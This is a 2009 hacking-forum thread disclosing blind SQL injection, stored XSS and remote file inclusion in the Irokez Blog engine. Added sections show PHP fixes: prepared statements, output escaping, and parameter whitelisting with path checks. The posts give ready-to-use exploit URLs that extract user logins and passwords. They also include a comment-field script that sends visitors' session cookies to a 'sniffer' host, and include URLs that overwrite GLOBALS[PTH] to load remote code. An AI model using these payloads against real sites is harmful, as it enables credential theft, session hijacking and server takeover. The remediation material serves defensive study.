Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS

Discussion in 'Web vulnerabilities' started by Corwin, 27 Feb 2009.

  1. Corwin (Elder), joined 1 Aug 2008
    Yet another engine whose author apparently has no idea about secure programming. Nothing particularly interesting, but it will be useful for beginners digging through other people's source code.

    Application: Irokez Blog
    Website: http://irokez.org
    Version: All (0.7.3.2)
    Date: 11-02-2009

    [ BLIND SQL-INJECTION ]

    [ SOME VULNERABLE CODE ]

    PHP:
    //classes/table.class.php
    ...
    // $id arrives straight from the URL and is interpolated into the SQL text unescaped
    if ($is_trans) {
        $query = "select t.*, m.* from {$this->_name} m"
               . " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
               . " where m.id = '$id' group by {$this->_lang}";
    } else {
        $query = "select * from {$this->_name} where id = '$id'";
    }
    $result = $this->db->exeQuery($query);
    ===>>> Exploit:

    http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
    http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
    etc

    [ ACTIVE XSS ]

    In the comments. We hijack the session and put it into our cookies.

    [ SOME VULNERABLE CODE ]

    PHP:
    /scripts/blog/output-post.inc.php
    ...
    <input id="name" type="text" class="text" name="name" value="<?php echo $name?>" />
    <label for="name"><?php echo $GLOBALS['LANG']['blog']['name']?></label>
    </li>
    <li>
        <input id="email" type="text" class="text" name="email" value="<?php echo $email?>" />
        <label for="email"><?php echo $GLOBALS['LANG']['blog']['email']?></label>
    </li>
    <li>
        <input id="site" type="text" class="text" name="site" value="<?php echo $site?>" />
        <label for="site"><?php echo $GLOBALS['LANG']['blog']['site']?></label>
    ...
    <textarea id="message" name="message" class="textarea"><?php echo $message?></textarea>
    ===>>> Exploit:

    <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>

    [ INCLUDE ]

    Via the superglobal array.

    [ SOME VULNERABLE CODE ]

    PHP:
    /thumbnail.php
    ...
    ob_start();
    switch ($module) {
        case 'gallery':
            // the include path is read from $GLOBALS['PTH'], which the request can overwrite
            include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php';
            $Obj = new TBL_Gallery;
            $image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src');
            break;
        default:
            $image_path = '';
    }
    ===>>> Exploit:

    http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
    http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
    http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
    http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]
    etc.
     
    2 people like this.
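The two fixes a maintainer would apply to the first post's snippets, written as an added example that is not Irokez Blog's own code: the `table.class.php` lookup rebuilt as a prepared statement (so `$id` is bound data, never SQL text), and the comment form from `output-post.inc.php` with every echoed value HTML-escaped. The `$pdo` handle, the function names and the in-memory SQLite table are assumptions made for the demonstration; the original engine uses `$this->db->exeQuery()`, whose driver the thread does not show.

```php
<?php
// Added example, not code from the Irokez Blog engine.
// Assumed: a PDO connection ($pdo); table and function names are for illustration.

// 1. classes/table.class.php lookup as a prepared statement.
//    The table name is a trusted class property, so it is only checked against an
//    identifier pattern; the user-controlled $id travels as a bound parameter.
function selectById(PDO $pdo, string $tableName, string $id): ?array
{
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $tableName)) {
        throw new InvalidArgumentException('invalid table name');
    }
    $stmt = $pdo->prepare("SELECT * FROM `{$tableName}` WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 2. scripts/blog/output-post.inc.php form: escape before echoing into an attribute
//    or a <textarea>, so a stored "<script>" comment is rendered as text.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function renderCommentForm(array $fields): string
{
    $html = '';
    foreach (['name', 'email', 'site'] as $f) {
        $v = h($fields[$f] ?? '');
        $html .= "<li><input id=\"{$f}\" type=\"text\" class=\"text\" name=\"{$f}\" value=\"{$v}\" /></li>\n";
    }
    $html .= '<textarea id="message" name="message" class="textarea">'
           . h($fields['message'] ?? '') . "</textarea>\n";
    return $html;
}

// Constructed sample data mirroring the payload shapes in the post.
$sample = [
    'name'    => '"><script>alert(1)</script>',
    'message' => '<script>img = new Image(); img.src = "http://sniffer/?" + document.cookie;</script>',
];
$out = renderCommentForm($sample);
assert(strpos($out, '<script>') === false);   // every tag is now &lt;script&gt;
echo $out;

// Constructed in-memory table to show that a quote in $id is data, not SQL.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE posts (id TEXT PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO posts VALUES ('15', 'hello')");
var_dump(selectById($pdo, 'posts', "15' or '1'='1"));   // NULL: no row has that literal id
var_dump(selectById($pdo, 'posts', '15'));              // the single matching row
```

With the bound parameter in place, the `' and ascii(substring(...))` probes from the post no longer change the query's meaning; the whole string is compared against the `id` column as a value. The escaping helper is applied at output time rather than on input, so the stored comment text stays intact and is rendered safely wherever it appears.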
  2. HAXTA4OK (Super Moderator, Staff Member), joined 15 Mar 2009
    http://site/irokezblog/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=[include]
    http://site/iirokezblog/scripts/search.scr.php?GLOBALS[PTH][classes]=[include]
    http://site/irokezblog/scripts/archive.scr.php?GLOBALS[PTH][classes]=[include]
     
    #2 HAXTA4OK, 19 Sep 2009 (last edited 19 Sep 2009)
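Both posts show request parameters named `GLOBALS[PTH][classes]` or `GLOBALS[spaw]` steering an `include_once`. The thread does not show how those parameters reach `$GLOBALS`; the added example below (not the engine's code) assumes the engine copies request variables into the global scope, register_globals style, and demonstrates the two defensive layers a maintainer would add: refuse superglobal names and anything not whitelisted at import time, and resolve the include against a fixed directory at use time. `importRequestVars`, `safeIncludePath`, the whitelist and the temporary directory are all assumptions for the demonstration.

```php
<?php
// Added example, not code from the Irokez Blog engine.
// Assumed: request variables are imported into the global scope by the engine.

// Layer 1: copy only whitelisted parameter names, and never a name that aliases a
// superglobal (a nested key such as GLOBALS[PTH][classes] arrives as the top-level
// key "GLOBALS", so checking the top-level name is enough).
function importRequestVars(array $request, array $allowedParams): array
{
    $forbidden = ['GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST',
                  '_SERVER', '_ENV', '_FILES', '_SESSION'];
    $imported = [];
    foreach ($request as $name => $value) {
        if (in_array($name, $forbidden, true) || !in_array($name, $allowedParams, true)) {
            continue;   // dropped: would clobber a superglobal or is not a known parameter
        }
        $imported[$name] = $value;
    }
    return $imported;
}

// Layer 2: the classes directory is fixed by the installer, and the include target
// must resolve to an existing file directly below it. basename() strips any
// directory or URL prefix; realpath() then rejects names that do not exist there.
function safeIncludePath(string $classesDir, string $file): string
{
    $base = realpath($classesDir);
    if ($base === false) {
        throw new RuntimeException('classes directory missing');
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . basename($file));
    if ($target === false || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include outside classes directory refused');
    }
    return $target;
}

// Constructed request shaped like the URLs in the thread.
$request = [
    'module' => 'gallery',
    'id'     => '15',
    'GLOBALS' => ['PTH' => ['classes' => 'http://attacker.example/']],   // constructed
];
$vars = importRequestVars($request, ['module', 'id']);
var_dump(array_keys($vars));   // ["module", "id"]: the GLOBALS key never reaches global scope

// Constructed classes directory so the example runs offline.
$classesDir = sys_get_temp_dir() . '/irokez_demo_' . getmypid();
mkdir($classesDir);
file_put_contents($classesDir . '/gallery.class.php', "<?php class TBL_Gallery {}\n");

// The thumbnail.php switch with the path fixed and the include checked.
switch ($vars['module'] ?? '') {
    case 'gallery':
        include_once safeIncludePath($classesDir, 'gallery.class.php');
        var_dump(class_exists('TBL_Gallery'));   // true: the legitimate class loaded
        break;
    default:
        break;
}

// A remote or traversing name is refused rather than included.
try {
    safeIncludePath($classesDir, 'http://attacker.example/shell.txt');
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";   // "include outside classes directory refused"
}

unlink($classesDir . '/gallery.class.php');
rmdir($classesDir);
```

On modern PHP the `register_globals` directive that made this pattern common is gone, but engines that emulate it with `extract($_REQUEST)` or a `foreach ($_GET as $k => $v) $$k = $v;` loop reintroduce exactly the `GLOBALS` overwrite seen here; the whitelist in `importRequestVars` closes that path regardless of PHP version, and `safeIncludePath` limits the damage should any other variable-overwrite slip through.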